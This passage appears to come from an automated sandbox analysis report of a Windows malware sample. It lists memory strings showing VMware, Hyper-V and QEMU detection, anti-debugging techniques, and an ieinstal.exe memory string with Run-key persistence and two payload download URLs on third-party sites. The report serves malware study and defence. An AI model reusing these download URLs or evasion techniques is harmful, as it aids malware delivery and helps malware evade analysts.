Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
Source: explorer.exe, 00000022.00000003.711372871.0000000004AAB000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000016.00000000.534558987.00000000083E7000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 00000022.00000003.678164630.0000000005FC7000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.727279202.0000000004D0A000.00000004.00000001.sdmp Binary or memory string: Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000022.00000003.719709332.00000000049A9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000022.00000003.719609820.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
Source: powershell.exe, 00000004.00000002.562061021.00000000074C4000.00000004.00000001.sdmp, ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000022.00000003.726098821.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&0000004*
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp Binary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}gramFiles(x86)=C:\Program FBZ*
Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\/
Source: wscript.exe, 00000000.00000003.372188213.00000190E2BBF000.00000004.00000001.sdmp Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.709669298.0000000004C50000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563f-
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000000.719680431.00000000060E2000.00000004.00000001.sdmp Binary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}es
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\_:^
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000PROFILE=C:\Users\userwindir
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
Source: explorer.exe, 00000022.00000003.725008203.0000000004D0A000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Br
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00I
Source: explorer.exe, 00000022.00000003.711993399.0000000004C3C000.00000004.00000001.sdmp Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmp Binary or memory string: NECVMWarer
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: explorer.exe, 00000022.00000003.724427605.0000000004CA0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000022.00000000.719680431.00000000060E2000.00000004.00000001.sdmp Binary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.372188213.00000190E2BBF000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at/bin_WUOAiR166.bin
Source: explorer.exe, 00000022.00000003.719709332.00000000049A9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B-4BFC-
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.725109525.0000000004CAF000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Beu^
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 00000016.00000000.587150869.000000000869A000.00000004.00000001.sdmp Binary or memory string: 700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B:u
Source: explorer.exe, 00000016.00000000.534350710.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}fb
Source: explorer.exe, 00000016.00000000.534350710.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000016.00000000.585239020.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000022.00000003.725109525.0000000004CAF000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bhja

Anti Debugging:

Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED46DE6 rdtsc 18_2_1ED46DE6
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD8ED6 mov eax, dword ptr fs:[00000030h] 18_2_1EDD8ED6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED48EC7 mov eax, dword ptr fs:[00000030h] 18_2_1ED48EC7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDBFEC0 mov eax, dword ptr fs:[00000030h] 18_2_1EDBFEC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED336CC mov eax, dword ptr fs:[00000030h] 18_2_1ED336CC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED316E0 mov ecx, dword ptr fs:[00000030h] 18_2_1ED316E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED176E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED176E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9FE87 mov eax, dword ptr fs:[00000030h] 18_2_1ED9FE87
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD0EA5 mov eax, dword ptr fs:[00000030h] 18_2_1EDD0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD0EA5 mov eax, dword ptr fs:[00000030h] 18_2_1EDD0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD0EA5 mov eax, dword ptr fs:[00000030h] 18_2_1EDD0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED846A7 mov eax, dword ptr fs:[00000030h] 18_2_1ED846A7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED17E41 mov eax, dword ptr fs:[00000030h] 18_2_1ED17E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCAE44 mov eax, dword ptr fs:[00000030h] 18_2_1EDCAE44
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2AE73 mov eax, dword ptr fs:[00000030h] 18_2_1ED2AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1766D mov eax, dword ptr fs:[00000030h] 18_2_1ED1766D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3A61C mov eax, dword ptr fs:[00000030h] 18_2_1ED3A61C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0C600 mov eax, dword ptr fs:[00000030h] 18_2_1ED0C600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED38E00 mov eax, dword ptr fs:[00000030h] 18_2_1ED38E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC1608 mov eax, dword ptr fs:[00000030h] 18_2_1EDC1608
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDBFE3F mov eax, dword ptr fs:[00000030h] 18_2_1EDBFE3F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0E620 mov eax, dword ptr fs:[00000030h] 18_2_1ED0E620
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED437F5 mov eax, dword ptr fs:[00000030h] 18_2_1ED437F5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED18794 mov eax, dword ptr fs:[00000030h] 18_2_1ED18794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED87794 mov eax, dword ptr fs:[00000030h] 18_2_1ED87794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1EF40 mov eax, dword ptr fs:[00000030h] 18_2_1ED1EF40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1FF60 mov eax, dword ptr fs:[00000030h] 18_2_1ED1FF60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD8F6A mov eax, dword ptr fs:[00000030h] 18_2_1EDD8F6A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2F716 mov eax, dword ptr fs:[00000030h] 18_2_1ED2F716
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9FF10 mov eax, dword ptr fs:[00000030h] 18_2_1ED9FF10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD070D mov eax, dword ptr fs:[00000030h] 18_2_1EDD070D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3A70E mov eax, dword ptr fs:[00000030h] 18_2_1ED3A70E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3E730 mov eax, dword ptr fs:[00000030h] 18_2_1ED3E730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED04F2E mov eax, dword ptr fs:[00000030h] 18_2_1ED04F2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD8CD6 mov eax, dword ptr fs:[00000030h] 18_2_1EDD8CD6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC14FB mov eax, dword ptr fs:[00000030h] 18_2_1EDC14FB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED86CF0 mov eax, dword ptr fs:[00000030h] 18_2_1ED86CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1849B mov eax, dword ptr fs:[00000030h] 18_2_1ED1849B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9C450 mov eax, dword ptr fs:[00000030h] 18_2_1ED9C450
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3A44B mov eax, dword ptr fs:[00000030h] 18_2_1ED3A44B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2746D mov eax, dword ptr fs:[00000030h] 18_2_1ED2746D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD740D mov eax, dword ptr fs:[00000030h] 18_2_1EDD740D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED86C0A mov eax, dword ptr fs:[00000030h] 18_2_1ED86C0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h] 18_2_1EDC1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3BC2C mov eax, dword ptr fs:[00000030h] 18_2_1ED3BC2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED86DC9 mov eax, dword ptr fs:[00000030h] 18_2_1ED86DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED86DC9 mov ecx, dword ptr fs:[00000030h] 18_2_1ED86DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDB8DF1 mov eax, dword ptr fs:[00000030h] 18_2_1EDB8DF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1D5E0 mov eax, dword ptr fs:[00000030h] 18_2_1ED1D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCFDE2 mov eax, dword ptr fs:[00000030h] 18_2_1EDCFDE2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3FD9B mov eax, dword ptr fs:[00000030h] 18_2_1ED3FD9B
